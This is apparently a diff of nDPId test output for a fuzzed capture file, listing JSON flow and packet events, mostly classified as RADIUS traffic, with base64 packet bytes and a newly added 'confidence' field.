+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1528996520912,"flow_last_seen":1528996740339,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":8452,"flow_avg_l4_payload_len":422,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00600{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996825583,"flow_last_seen":1528996825583,"flow_idle_time":180000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00796{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1528996825583,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"ts_msec":1528996825583,"pkt":"AAAMB6xAABRP+4rqCABFAAEjINtAAP8RAAAKDEAexuIZNXIQBxUBDwAABB8BBzWIo5zi+WF\/SUvYePTRu6oBEzAyLTA4LWVjLWJiLWJiLWJVBQYAAAABBAbY6pSHCAYKQABAIBBWZXJpem9uUHJlUHJvZBoMAAA3YwEGAAAAASwhNWIyMjljYVovMDI6MDg6ZWM6YmI6YmI6YmIvMlYzM31OAAAAEy0GAAAAAzcGWyKj2SgGAAAAAioGBPtwQzQGAAAAACsGAboEJTUGAAAAAC8GAAoJnjAGAAIn3DEGAABMAS4GAAIHOSlUAAAAAB8TMDItMDgtZWMtYmItYmItYmIeJDcwLTdkLWI5LWFkLTVkLTYwOnZlcml6b25ndWVzdHdpZmkaDAAABYMHBsAf3qs="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996825583,"flow_last_seen":1528996825583,"flow_idle_time":180000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996825583,"flow_last_seen":1528996825583,"flow_idle_time":180000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1528996825583,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1528996832079,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":251,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":251,"pkt_l4_len":217,"ts_msec":1528996832079,"pkt":"AAAMB6xAABRP+4rqCABFAADtINxAAP8RAAAKDEAexuIZNXIQBxUA2QAABCAA0XhHQDWMoVost5kNJ4VLqq8BEzAyLTA4LWVjLWJiLWJiLWJiBQYAAAABBAbY6pSHCAYKQABAIBBWZXJpem9uUHJlUHJvZBoMAAA3YwEGAAAAASwhNWIyMmEzZGYvMDI6MDg6ZWM6YmI6YmI6YmIvMjYWND0GAAAAEy0GAAAAAzcGWyKj3ygGAAAAAR8TMDItMDgtZWMtYmItYmItYmIOJDcwLTdkLWI5LWFkLTVkLTYwOnZlcml6b25ndWVzU3dpZmkaDAAABYMHBsAf3qs="}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1528996520912,"flow_last_seen":1528996740339,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":8452,"flow_avg_l4_payload_len":422,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1528996520912,"flow_last_seen":1528996740339,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":8452,"flow_avg_l4_payload_len":422,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996825583,"flow_last_seen":1528996832079,"flow_idle_time":180000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996825583,"flow_last_seen":1528996832079,"flow_idle_time":180000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01383{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1528996990566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528996990566,"pkt":"AAAMB6xAABRP+4rqCABFAALbIN1AAP8Rqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1528996990648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"ts_msec":1528996990648,"pkt":"ABRP+4rqcNuYVcUnCABFAACFzqFAAPwRhYTG4hk1CgxAHgcVclAAcSboBSEAaT3FxpV5xYvpMtB7xhdyjsUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhOS5tbmNwODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgJWIyMmEzMWMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjEx"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996996259,"flow_last_seen":1528996996259,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996996259,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1528996996259,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528996996259,"pkt":"AAAMB6xAABRP+4rqCABFAALbINxAAP8RAAAKDEAexuIZNXIQBxQCxwAAASICv7Yv\/WlFXBqHBv3fu5YpDVoaCnUAV8gOBFVlGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM5JQBbIqSEATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5tcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwL2UwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjE4AAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjk4NGE0MjI1YiwgNWIyMmE0ODQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE1BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2Tz4CAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyIcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMCUANzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNGw4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGngAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASZNGDc45HDmjfBze1twcyVA=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996996259,"flow_last_seen":1528996996259,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996996259,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996996259,"flow_last_seen":1528996996259,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528996996259,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1528996996503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528996996503,"pkt":"ABRP+4rqcNuYVcUnCABFAADh+51AAPsRXSzG4hk1CgxAHgcUchAAzR\/LCyIAxVQfJM4RpoRtNjxDV0PMI8sBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3bzBrLm9yZywgNWIyMmE0ODQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE1T0oBAgBIFwEAAAEFAADanpY2Uv6YDPhh9hE3UcT2AgUAAG1\/CBmbKwAAhtjCapVn1syLAQACCwUAAAn4fIUbByaWjF3e+n8Yh01QEnV94tKdRs0y6PLijrd5hG8="}
 01355{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1528996996859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528996996859,"pkt":"AAAMB6xAABRP+4rqCABFAALHIN9AAP8RAAAKDEAexuIZNXIQBxQCswAAASMCq4xQkUYeS9sWwukAzbzPtJYaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM5NwZbIqSEATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5HcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBfIAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjk4JQA0MjI1YiwgNWIyMmE0ODQvZjA+Nzk6NjA6ZCUAN2Q6MzcvMjE1BAasFAEQIA5WWldDMlRlc3QhYWIaDAAAN2MBBgAAACUABgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAAr7vexdwItwvckVLELdYVsAwIAIHeIg7QaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpRZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIE